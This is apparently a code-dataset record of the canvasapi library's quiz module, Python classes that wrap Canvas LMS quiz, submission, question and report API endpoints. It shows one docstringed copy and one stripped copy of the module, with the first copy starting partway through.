<https://canvas.instructure.com/doc/api/quizzes.html#method.quizzes/quizzes_api.update>`_
:returns: The updated quiz.
:rtype: :class:`canvasapi.quiz.Quiz`
"""
response = self._requester.request(
"PUT",
"courses/{}/quizzes/{}".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
quiz_json = response.json()
quiz_json.update({"course_id": self.course_id})
return Quiz(self._requester, quiz_json)
def get_all_quiz_reports(self, **kwargs):
"""
Get a list of all quiz reports for this quiz
:calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/reports \
<https://canvas.instructure.com/doc/api/quiz_reports.html#method.quizzes/quiz_reports.index>`_
:rtype: :class:`canvasapi.paginated_list.PaginatedList` of
:class:`canvasapi.quiz.QuizReport`
"""
return PaginatedList(
QuizReport,
self._requester,
"GET",
"courses/{}/quizzes/{}/reports".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
def get_all_quiz_submissions(self, **kwargs):
"""
Get a list of all submissions for this quiz.
.. warning::
.. deprecated:: 0.13.0
Use :func:`canvasapi.quiz.Quiz.get_submissions` instead.
:calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/submissions \
<https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.index>`_
:rtype: list of :class:`canvasapi.quiz.QuizSubmission`
"""
warnings.warn(
"`get_all_quiz_submissions` is being deprecated and will be removed in a "
"future version. Use `get_submissions` instead",
DeprecationWarning,
)
return self.get_submissions(**kwargs)
def get_question(self, question, **kwargs):
"""
Get as single quiz question by ID.
:calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/questions/:id \
<https://canvas.instructure.com/doc/api/quiz_questions.html#method.quizzes/quiz_questions.show>`_
:param question: The object or ID of the quiz question to retrieve.
:type question: int, str or :class:`canvasapi.quiz.QuizQuestion`
:rtype: :class:`canvasapi.quiz.QuizQuestion`
"""
question_id = obj_or_id(question, "question", (QuizQuestion,))
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/questions/{}".format(
self.course_id, self.id, question_id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizQuestion(self._requester, response_json)
def get_questions(self, **kwargs):
"""
List all questions for a quiz.
:calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/questions \
<https://canvas.instructure.com/doc/api/quiz_questions.html#method.quizzes/quiz_questions.index>`_
:rtype: :class:`canvasapi.paginated_list.PaginatedList` of
:class:`canvasapi.quiz.QuizQuestion`
"""
return PaginatedList(
QuizQuestion,
self._requester,
"GET",
"courses/{}/quizzes/{}/questions".format(self.course_id, self.id),
{"course_id": self.course_id},
_kwargs=combine_kwargs(**kwargs),
)
def get_quiz_group(self, id, **kwargs):
"""
Get details of the quiz group with the given id
:calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/groups/:id \
<https://canvas.instructure.com/doc/api/quiz_question_groups.html#method.quizzes/quiz_groups.show>`_
:param id: The ID of the question group.
:type id: int
:returns: `QuizGroup` object
:rtype: :class:`canvasapi.quiz_group.QuizGroup`
"""
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/groups/{}".format(self.course_id, self.id, id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.id})
return QuizGroup(self._requester, response_json)
def get_quiz_report(self, id, **kwargs):
"""
Returns the data for a single quiz report.
:calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/reports/:id \
<https://canvas.instructure.com/doc/api/quiz_reports.html#method.quizzes/quiz_reports.show>`_
:param id: The ID of the quiz report you want to retrieve, or the report object
:type id: int or :class:`canvasapi.quiz.QuizReport`
:returns: `QuizReport` object
:rtype: :class:`canvasapi.quiz.QuizReport`
"""
id = obj_or_id(id, "id", (QuizReport,))
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/reports/{}".format(self.course_id, self.id, id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizReport(self._requester, response_json)
def get_quiz_submission(self, quiz_submission, **kwargs):
"""
Get a single quiz submission.
:calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id \
<https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.show>`_
:param quiz_submission: The object or ID of the quiz submission to retrieve.
:type quiz_submission: int, string, :class:`canvasapi.quiz.QuizSubmission`
:rtype: :class:`canvasapi.quiz.QuizSubmission`
"""
quiz_submission_id = obj_or_id(
quiz_submission, "quiz_submission", (QuizSubmission,)
)
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/submissions/{}".format(
self.course_id, self.id, quiz_submission_id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()["quiz_submissions"][0]
response_json.update({"course_id": self.course_id})
if len(response.json().get("quizzes", [])) > 0:
response_json.update(
{"quiz": Quiz(self._requester, response.json()["quizzes"][0])}
)
if len(response.json().get("submissions", [])) > 0:
response_json.update(
{
"submission": Submission(
self._requester, response.json()["submissions"][0]
)
}
)
if len(response.json().get("users", [])) > 0:
response_json.update(
{"user": User(self._requester, response.json()["users"][0])}
)
return QuizSubmission(self._requester, response_json)
def get_statistics(self, **kwargs):
"""
Get statistics for for all quiz versions, or the latest quiz version.
:calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/statistics \
<https://canvas.instructure.com/doc/api/quiz_statistics.html#method.quizzes/quiz_statistics.index>`_
:rtype: :class:`canvasapi.paginated_list.PaginatedList` of
:class:`canvasapi.quiz.QuizStatistic`
"""
return PaginatedList(
QuizStatistic,
self._requester,
"GET",
"courses/{}/quizzes/{}/statistics".format(self.course_id, self.id),
{"course_id": self.course_id},
_root="quiz_statistics",
_kwargs=combine_kwargs(**kwargs),
)
def get_submissions(self, **kwargs):
"""
Get a list of all submissions for this quiz.
:calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/submissions \
<https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.index>`_
:rtype: :class:`canvasapi.paginated_list.PaginatedList` of
:class:`canvasapi.quiz.QuizSubmission`
"""
return PaginatedList(
QuizSubmission,
self._requester,
"GET",
"courses/{}/quizzes/{}/submissions".format(self.course_id, self.id),
{"course_id": self.course_id},
_root="quiz_submissions",
_kwargs=combine_kwargs(**kwargs),
)
def set_extensions(self, quiz_extensions, **kwargs):
"""
Set extensions for student quiz submissions.
:calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/extensions
<https://canvas.instructure.com/doc/api/quiz_extensions.html#method.quizzes/quiz_extensions.create>`_
:param quiz_extensions: List of dictionaries representing extensions.
:type quiz_extensions: list
:rtype: list of :class:`canvasapi.quiz.QuizExtension`
Example Usage:
>>> quiz.set_extensions([
... {
... 'user_id': 1,
... 'extra_time': 60,
... 'extra_attempts': 1
... },
... {
... 'user_id': 2,
... 'extra_attempts': 3
... },
... {
... 'user_id': 3,
... 'extra_time': 20
... }
... ])
"""
if not isinstance(quiz_extensions, list) or not quiz_extensions:
raise ValueError("Param `quiz_extensions` must be a non-empty list.")
if any(not isinstance(extension, dict) for extension in quiz_extensions):
raise ValueError("Param `quiz_extensions` must only contain dictionaries")
if any("user_id" not in extension for extension in quiz_extensions):
raise RequiredFieldMissing(
"Dictionaries in `quiz_extensions` must contain key `user_id`"
)
kwargs["quiz_extensions"] = quiz_extensions
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/extensions".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
extension_list = response.json()["quiz_extensions"]
return [
QuizExtension(self._requester, extension) for extension in extension_list
]
@python_2_unicode_compatible
class QuizStatistic(CanvasObject):
def __str__(self):
return "Quiz Statistic {}".format(self.id)
@python_2_unicode_compatible
class QuizSubmission(CanvasObject):
def __str__(self):
return "Quiz {} - User {} ({})".format(self.quiz_id, self.user_id, self.id)
def answer_submission_questions(self, validation_token=None, **kwargs):
"""
Provide or update an answer to one or more quiz questions.
:calls: `POST /api/v1/quiz_submissions/:quiz_submission_id/questions \
<https://canvas.instructure.com/doc/api/quiz_submission_questions.html#method.quizzes/quiz_submission_questions.answer>`_
:param validation_token: (Optional) The unique validation token for this quiz submission.
If one is not provided, canvasapi will attempt to use `self.validation_token`.
:type validation_token: str
:returns: A list of quiz submission questions.
:rtype: list of :class:`canvasapi.quiz.QuizSubmissionQuestion`
"""
try:
kwargs["validation_token"] = validation_token or self.validation_token
except AttributeError:
raise RequiredFieldMissing(
"`validation_token` not set on this QuizSubmission, must be passed"
" as a function argument."
)
# Only the latest attempt for a quiz submission can be updated, and Canvas
# automatically returns the latest attempt with every quiz submission response,
# so we can just use that.
kwargs["attempt"] = self.attempt
response = self._requester.request(
"POST",
"quiz_submissions/{}/questions".format(self.id),
_kwargs=combine_kwargs(**kwargs),
)
questions = list()
for question in response.json().get("quiz_submission_questions", []):
question.update(
{
"quiz_submission_id": self.id,
"validation_token": kwargs["validation_token"],
"attempt": self.attempt,
}
)
questions.append(QuizSubmissionQuestion(self._requester, question))
return questions
def complete(self, validation_token=None, **kwargs):
"""
Complete the quiz submission by marking it as complete and grading it. When the quiz
submission has been marked as complete, no further modifications will be allowed.
:calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/complete \
<https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.complete>`_
:param validation_token: (Optional) The unique validation token for this quiz submission.
If one is not provided, canvasapi will attempt to use `self.validation_token`.
:type validation_token: str
:rtype: :class:`canvasapi.quiz.QuizSubmission`
"""
try:
kwargs["validation_token"] = validation_token or self.validation_token
except AttributeError:
raise RequiredFieldMissing(
"`validation_token` not set on this QuizSubmission, must be passed"
" as a function argument."
)
# Only the latest attempt for a quiz submission can be updated, and Canvas
# automatically returns the latest attempt with every quiz submission response,
# so we can just use that.
kwargs["attempt"] = self.attempt
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/submissions/{}/complete".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()["quiz_submissions"][0]
return QuizSubmission(self._requester, response_json)
def get_submission_events(self, **kwargs):
"""
Retrieve the set of events captured during a specific submission attempt.
:calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/events \
<https://canvas.instructure.com/doc/api/quiz_submission_events.html#method.quizzes/quiz_submission_events_api.index>`_
:returns: list of QuizSubmissionEvents.
:rtype: list
"""
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/submissions/{}/events".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
events = response.json()["quiz_submission_events"]
return [QuizSubmissionEvent(self._requester, event) for event in events]
def get_submission_questions(self, **kwargs):
"""
Get a list of all the question records for this quiz submission.
:calls: `GET /api/v1/quiz_submissions/:quiz_submission_id/questions \
<https://canvas.instructure.com/doc/api/quiz_submission_questions.html#method.quizzes/quiz_submission_questions.index>`_
:returns: A list of quiz submission questions.
:rtype: list of :class:`canvasapi.quiz.QuizSubmissionQuestion`
"""
response = self._requester.request(
"GET",
"quiz_submissions/{}/questions".format(self.id),
_kwargs=combine_kwargs(**kwargs),
)
questions = list()
for question in response.json().get("quiz_submission_questions", []):
question.update({"quiz_submission_id": self.id, "attempt": self.attempt})
questions.append(QuizSubmissionQuestion(self._requester, question))
return questions
def get_times(self, **kwargs):
"""
Get the current timing data for the quiz attempt, both the end_at timestamp and the
time_left parameter.
:calls: `GET /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/time \
<https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.time>`_
:rtype: dict
"""
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/submissions/{}/time".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
return response.json()
def submit_events(self, quiz_submission_events, **kwargs):
"""
Store a set of events which were captured during a quiz taking session.
:calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id/events \
<https://canvas.instructure.com/doc/api/quiz_submission_events.html#method.quizzes/quiz_submission_events_api.create>`_
:param quiz_submission_events: The submission events to be recorded.
:type quiz_submission_events: list
:returns: True if the submission was successful, false otherwise.
:rtype: bool
"""
if isinstance(quiz_submission_events, list) and isinstance(
quiz_submission_events[0], QuizSubmissionEvent
):
kwargs["quiz_submission_events"] = quiz_submission_events
else:
raise RequiredFieldMissing(
"Required parameter quiz_submission_events missing."
)
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/submissions/{}/events".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
return response.status_code == 204
def update_score_and_comments(self, **kwargs):
"""
Update the amount of points a student has scored for questions they've answered, provide
comments for the student about their answer(s), or simply fudge the total score by a
specific amount of points.
:calls: `PUT /api/v1/courses/:course_id/quizzes/:quiz_id/submissions/:id \
<https://canvas.instructure.com/doc/api/quiz_submissions.html#method.quizzes/quiz_submissions_api.update>`_
:returns: The updated quiz.
:rtype: :class:`canvasapi.quiz.QuizSubmission`
"""
response = self._requester.request(
"PUT",
"courses/{}/quizzes/{}/submissions/{}".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()["quiz_submissions"][0]
response_json.update({"course_id": self.course_id})
return QuizSubmission(self._requester, response_json)
@python_2_unicode_compatible
class QuizExtension(CanvasObject):
def __str__(self):
return "{}-{}".format(self.quiz_id, self.user_id)
@python_2_unicode_compatible
class QuizQuestion(CanvasObject):
def __str__(self):
return "{} ({})".format(self.question_name, self.id)
def delete(self, **kwargs):
"""
Delete an existing quiz question.
:calls: `DELETE /api/v1/courses/:course_id/quizzes/:quiz_id/questions/:id \
<https://canvas.instructure.com/doc/api/quiz_questions.html#method.quizzes/quiz_questions.destroy>`_
:returns: True if question was successfully deleted; False otherwise.
:rtype: bool
"""
response = self._requester.request(
"DELETE",
"courses/{}/quizzes/{}/questions/{}".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
return response.status_code == 204
def edit(self, **kwargs):
"""
Update an existing quiz question.
:calls: `PUT /api/v1/courses/:course_id/quizzes/:quiz_id/questions/:id \
<https://canvas.instructure.com/doc/api/quiz_questions.html#method.quizzes/quiz_questions.update>`_
:rtype: :class:`canvasapi.quiz.QuizQuestion`
"""
response = self._requester.request(
"PUT",
"courses/{}/quizzes/{}/questions/{}".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
super(QuizQuestion, self).set_attributes(response_json)
return self
@python_2_unicode_compatible
class QuizReport(CanvasObject):
def __str__(self):
return "{} ({})".format(self.report_type, self.id)
def abort_or_delete(self, **kwargs):
"""
This API allows you to cancel a previous request you issued for a report to be generated.
Or in the case of an already generated report, you'd like to remove it, perhaps to generate
it another time with an updated version that provides new features.
:calls: `DELETE /api/v1/courses/:course_id/quizzes/:quiz_id/reports/:id \
<https://canvas.instructure.com/doc/api/quiz_reports.html#method.quizzes/quiz_reports.abort>`_
:returns: True if attempt was successful; False otherwise
:rtype: bool
"""
response = self._requester.request(
"DELETE",
"courses/{}/quizzes/{}/reports/{}".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
return response.status_code == 204
@python_2_unicode_compatible
class QuizSubmissionEvent(CanvasObject):
def __str__(self):
return "{}".format(self.event_type)
@python_2_unicode_compatible
class QuizSubmissionQuestion(CanvasObject):
def __str__(self):
return "QuizSubmissionQuestion #{}".format(self.id)
def flag(self, validation_token=None, **kwargs):
"""
Set a flag on a quiz question to indicate that it should be returned to later.
:calls: `PUT /api/v1/quiz_submissions/:quiz_submission_id/questions/:id/flag \
<https://canvas.instructure.com/doc/api/quiz_submission_questions.html#method.quizzes/quiz_submission_questions.flag>`_
:param validation_token: (Optional) The unique validation token for the quiz submission.
If one is not provided, canvasapi will attempt to use `self.validation_token`.
:type validation_token: str
:returns: True if the question was successfully flagged, False otherwise.
:rtype: bool
"""
try:
kwargs["validation_token"] = validation_token or self.validation_token
except AttributeError:
raise RequiredFieldMissing(
"`validation_token` not set on this QuizSubmissionQuestion, must be passed"
" as a function argument."
)
# Only the latest attempt for a quiz submission can be updated, and Canvas
# automatically returns the latest attempt with every quiz submission response,
# so we can just use that.
kwargs["attempt"] = self.attempt
response = self._requester.request(
"PUT",
"quiz_submissions/{}/questions/{}/flag".format(
self.quiz_submission_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
question = response.json()["quiz_submission_questions"][0]
question.update(
{
"validation_token": kwargs["validation_token"],
"quiz_submission_id": self.quiz_submission_id,
}
)
super(QuizSubmissionQuestion, self).set_attributes(question)
return True
def unflag(self, validation_token=None, **kwargs):
"""
Remove a previously set flag on a quiz question.
:calls: `PUT /api/v1/quiz_submissions/:quiz_submission_id/questions/:id/unflag \
<https://canvas.instructure.com/doc/api/quiz_submission_questions.html#method.quizzes/quiz_submission_questions.unflag>`_
:param validation_token: (Optional) The unique validation token for the quiz submission.
If one is not provided, canvasapi will attempt to use `self.validation_token`.
:type validation_token: str
:returns: True if the question was successfully unflagged, False otherwise.
:rtype: bool
"""
try:
kwargs["validation_token"] = validation_token or self.validation_token
except AttributeError:
raise RequiredFieldMissing(
"`validation_token` not set on this QuizSubmissionQuestion, must be passed"
" as a function argument."
)
# Only the latest attempt for a quiz submission can be updated, and Canvas
# automatically returns the latest attempt with every quiz submission response,
# so we can just use that.
kwargs["attempt"] = self.attempt
response = self._requester.request(
"PUT",
"quiz_submissions/{}/questions/{}/unflag".format(
self.quiz_submission_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
question = response.json()["quiz_submission_questions"][0]
question.update(
{
"validation_token": kwargs["validation_token"],
"quiz_submission_id": self.quiz_submission_id,
}
)
super(QuizSubmissionQuestion, self).set_attributes(question)
return True
@python_2_unicode_compatible
class QuizAssignmentOverrideSet(CanvasObject):
def __str__(self):
return "Overrides for quiz_id {}".format(self.quiz_id)
| 37.682682 | 129 | 0.622131 | from __future__ import absolute_import, division, print_function, unicode_literals
import warnings
from six import python_2_unicode_compatible
from canvasapi.canvas_object import CanvasObject
from canvasapi.exceptions import RequiredFieldMissing
from canvasapi.paginated_list import PaginatedList
from canvasapi.quiz_group import QuizGroup
from canvasapi.submission import Submission
from canvasapi.user import User
from canvasapi.util import combine_kwargs, obj_or_id
@python_2_unicode_compatible
class Quiz(CanvasObject):
def __str__(self):
return "{} ({})".format(self.title, self.id)
def broadcast_message(self, conversations, **kwargs):
required_key_list = ["body", "recipients", "subject"]
required_keys_present = all((x in conversations for x in required_key_list))
if isinstance(conversations, dict) and required_keys_present:
kwargs["conversations"] = conversations
else:
raise RequiredFieldMissing(
(
"conversations must be a dictionary with keys "
"'body', 'recipients', and 'subject'."
)
)
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/submission_users/message".format(
self.course_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
return response.status_code == 201
def create_question(self, **kwargs):
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/questions".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizQuestion(self._requester, response_json)
def create_question_group(self, quiz_groups, **kwargs):
if not isinstance(quiz_groups, list) or not quiz_groups:
raise ValueError("Param `quiz_groups` must be a non-empty list.")
if not isinstance(quiz_groups[0], dict):
raise ValueError("Param `quiz_groups must contain a dictionary")
param_list = [
"name",
"pick_count",
"question_points",
"assessment_question_bank_id",
]
if not any(param in quiz_groups[0] for param in param_list):
raise RequiredFieldMissing("quiz_groups must contain at least 1 parameter.")
kwargs["quiz_groups"] = quiz_groups
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/groups".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json["quiz_groups"][0].update({"course_id": self.id})
return QuizGroup(self._requester, response_json.get("quiz_groups")[0])
def create_report(self, report_type, **kwargs):
if report_type not in ["student_analysis", "item_analysis"]:
raise ValueError(
"Param `report_type` must be a either 'student_analysis' or 'item_analysis'"
)
kwargs["quiz_report"] = {"report_type": report_type}
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/reports".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizReport(self._requester, response_json)
def create_submission(self, **kwargs):
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/submissions".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()["quiz_submissions"][0]
response_json.update({"course_id": self.course_id})
return QuizSubmission(self._requester, response_json)
def delete(self, **kwargs):
response = self._requester.request(
"DELETE",
"courses/{}/quizzes/{}".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
quiz_json = response.json()
quiz_json.update({"course_id": self.course_id})
return Quiz(self._requester, quiz_json)
def edit(self, **kwargs):
response = self._requester.request(
"PUT",
"courses/{}/quizzes/{}".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
quiz_json = response.json()
quiz_json.update({"course_id": self.course_id})
return Quiz(self._requester, quiz_json)
def get_all_quiz_reports(self, **kwargs):
return PaginatedList(
QuizReport,
self._requester,
"GET",
"courses/{}/quizzes/{}/reports".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
def get_all_quiz_submissions(self, **kwargs):
warnings.warn(
"`get_all_quiz_submissions` is being deprecated and will be removed in a "
"future version. Use `get_submissions` instead",
DeprecationWarning,
)
return self.get_submissions(**kwargs)
def get_question(self, question, **kwargs):
question_id = obj_or_id(question, "question", (QuizQuestion,))
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/questions/{}".format(
self.course_id, self.id, question_id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizQuestion(self._requester, response_json)
def get_questions(self, **kwargs):
return PaginatedList(
QuizQuestion,
self._requester,
"GET",
"courses/{}/quizzes/{}/questions".format(self.course_id, self.id),
{"course_id": self.course_id},
_kwargs=combine_kwargs(**kwargs),
)
def get_quiz_group(self, id, **kwargs):
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/groups/{}".format(self.course_id, self.id, id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.id})
return QuizGroup(self._requester, response_json)
def get_quiz_report(self, id, **kwargs):
id = obj_or_id(id, "id", (QuizReport,))
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/reports/{}".format(self.course_id, self.id, id),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
return QuizReport(self._requester, response_json)
def get_quiz_submission(self, quiz_submission, **kwargs):
quiz_submission_id = obj_or_id(
quiz_submission, "quiz_submission", (QuizSubmission,)
)
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/submissions/{}".format(
self.course_id, self.id, quiz_submission_id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()["quiz_submissions"][0]
response_json.update({"course_id": self.course_id})
if len(response.json().get("quizzes", [])) > 0:
response_json.update(
{"quiz": Quiz(self._requester, response.json()["quizzes"][0])}
)
if len(response.json().get("submissions", [])) > 0:
response_json.update(
{
"submission": Submission(
self._requester, response.json()["submissions"][0]
)
}
)
if len(response.json().get("users", [])) > 0:
response_json.update(
{"user": User(self._requester, response.json()["users"][0])}
)
return QuizSubmission(self._requester, response_json)
def get_statistics(self, **kwargs):
return PaginatedList(
QuizStatistic,
self._requester,
"GET",
"courses/{}/quizzes/{}/statistics".format(self.course_id, self.id),
{"course_id": self.course_id},
_root="quiz_statistics",
_kwargs=combine_kwargs(**kwargs),
)
def get_submissions(self, **kwargs):
return PaginatedList(
QuizSubmission,
self._requester,
"GET",
"courses/{}/quizzes/{}/submissions".format(self.course_id, self.id),
{"course_id": self.course_id},
_root="quiz_submissions",
_kwargs=combine_kwargs(**kwargs),
)
def set_extensions(self, quiz_extensions, **kwargs):
if not isinstance(quiz_extensions, list) or not quiz_extensions:
raise ValueError("Param `quiz_extensions` must be a non-empty list.")
if any(not isinstance(extension, dict) for extension in quiz_extensions):
raise ValueError("Param `quiz_extensions` must only contain dictionaries")
if any("user_id" not in extension for extension in quiz_extensions):
raise RequiredFieldMissing(
"Dictionaries in `quiz_extensions` must contain key `user_id`"
)
kwargs["quiz_extensions"] = quiz_extensions
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/extensions".format(self.course_id, self.id),
_kwargs=combine_kwargs(**kwargs),
)
extension_list = response.json()["quiz_extensions"]
return [
QuizExtension(self._requester, extension) for extension in extension_list
]
@python_2_unicode_compatible
class QuizStatistic(CanvasObject):
def __str__(self):
return "Quiz Statistic {}".format(self.id)
@python_2_unicode_compatible
class QuizSubmission(CanvasObject):
def __str__(self):
return "Quiz {} - User {} ({})".format(self.quiz_id, self.user_id, self.id)
def answer_submission_questions(self, validation_token=None, **kwargs):
try:
kwargs["validation_token"] = validation_token or self.validation_token
except AttributeError:
raise RequiredFieldMissing(
"`validation_token` not set on this QuizSubmission, must be passed"
" as a function argument."
)
kwargs["attempt"] = self.attempt
response = self._requester.request(
"POST",
"quiz_submissions/{}/questions".format(self.id),
_kwargs=combine_kwargs(**kwargs),
)
questions = list()
for question in response.json().get("quiz_submission_questions", []):
question.update(
{
"quiz_submission_id": self.id,
"validation_token": kwargs["validation_token"],
"attempt": self.attempt,
}
)
questions.append(QuizSubmissionQuestion(self._requester, question))
return questions
def complete(self, validation_token=None, **kwargs):
try:
kwargs["validation_token"] = validation_token or self.validation_token
except AttributeError:
raise RequiredFieldMissing(
"`validation_token` not set on this QuizSubmission, must be passed"
" as a function argument."
)
kwargs["attempt"] = self.attempt
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/submissions/{}/complete".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()["quiz_submissions"][0]
return QuizSubmission(self._requester, response_json)
def get_submission_events(self, **kwargs):
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/submissions/{}/events".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
events = response.json()["quiz_submission_events"]
return [QuizSubmissionEvent(self._requester, event) for event in events]
def get_submission_questions(self, **kwargs):
response = self._requester.request(
"GET",
"quiz_submissions/{}/questions".format(self.id),
_kwargs=combine_kwargs(**kwargs),
)
questions = list()
for question in response.json().get("quiz_submission_questions", []):
question.update({"quiz_submission_id": self.id, "attempt": self.attempt})
questions.append(QuizSubmissionQuestion(self._requester, question))
return questions
def get_times(self, **kwargs):
response = self._requester.request(
"GET",
"courses/{}/quizzes/{}/submissions/{}/time".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
return response.json()
def submit_events(self, quiz_submission_events, **kwargs):
if isinstance(quiz_submission_events, list) and isinstance(
quiz_submission_events[0], QuizSubmissionEvent
):
kwargs["quiz_submission_events"] = quiz_submission_events
else:
raise RequiredFieldMissing(
"Required parameter quiz_submission_events missing."
)
response = self._requester.request(
"POST",
"courses/{}/quizzes/{}/submissions/{}/events".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
return response.status_code == 204
def update_score_and_comments(self, **kwargs):
response = self._requester.request(
"PUT",
"courses/{}/quizzes/{}/submissions/{}".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()["quiz_submissions"][0]
response_json.update({"course_id": self.course_id})
return QuizSubmission(self._requester, response_json)
@python_2_unicode_compatible
class QuizExtension(CanvasObject):
def __str__(self):
return "{}-{}".format(self.quiz_id, self.user_id)
@python_2_unicode_compatible
class QuizQuestion(CanvasObject):
def __str__(self):
return "{} ({})".format(self.question_name, self.id)
def delete(self, **kwargs):
response = self._requester.request(
"DELETE",
"courses/{}/quizzes/{}/questions/{}".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
return response.status_code == 204
def edit(self, **kwargs):
response = self._requester.request(
"PUT",
"courses/{}/quizzes/{}/questions/{}".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
response_json = response.json()
response_json.update({"course_id": self.course_id})
super(QuizQuestion, self).set_attributes(response_json)
return self
@python_2_unicode_compatible
class QuizReport(CanvasObject):
def __str__(self):
return "{} ({})".format(self.report_type, self.id)
def abort_or_delete(self, **kwargs):
response = self._requester.request(
"DELETE",
"courses/{}/quizzes/{}/reports/{}".format(
self.course_id, self.quiz_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
return response.status_code == 204
@python_2_unicode_compatible
class QuizSubmissionEvent(CanvasObject):
def __str__(self):
return "{}".format(self.event_type)
@python_2_unicode_compatible
class QuizSubmissionQuestion(CanvasObject):
def __str__(self):
return "QuizSubmissionQuestion #{}".format(self.id)
def flag(self, validation_token=None, **kwargs):
try:
kwargs["validation_token"] = validation_token or self.validation_token
except AttributeError:
raise RequiredFieldMissing(
"`validation_token` not set on this QuizSubmissionQuestion, must be passed"
" as a function argument."
)
kwargs["attempt"] = self.attempt
response = self._requester.request(
"PUT",
"quiz_submissions/{}/questions/{}/flag".format(
self.quiz_submission_id, self.id
),
_kwargs=combine_kwargs(**kwargs),
)
question = response.json()["quiz_submission_questions"][0]
question.update(
{
"validation_token": kwargs["validation_token"],
"quiz_submission_id": self.quiz_submission_id,
}
)
super(QuizSubmissionQuestion, self).set_attributes(question)
return True
